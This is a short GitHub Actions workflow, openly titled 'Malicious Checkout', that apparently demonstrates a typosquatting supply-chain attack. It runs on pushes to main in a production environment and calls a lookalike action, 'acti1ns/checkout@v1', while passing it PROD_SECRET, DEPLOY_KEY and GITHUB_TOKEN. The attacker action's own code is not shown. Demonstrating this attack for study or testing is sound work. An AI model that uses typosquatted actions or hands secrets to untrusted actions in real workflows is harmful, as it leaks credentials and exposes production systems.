name: Malicious Checkout

on:
  push:
    branches: [ main ]

jobs:
  build:
    runs-on: ubuntu-latest
    environment: production
    steps:
      - name: Use Malicious Checkout
        uses: acti1ns/checkout@v1   # 👈 This is the attacker repo (typosquatted)
        with:
          dummy: trigger            # Optional dummy input to simulate usage
        env:
          PROD_SECRET: ${{ secrets.PROD_SECRET }}
          DEPLOY_KEY: ${{ secrets.DEPLOY_KEY }}
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
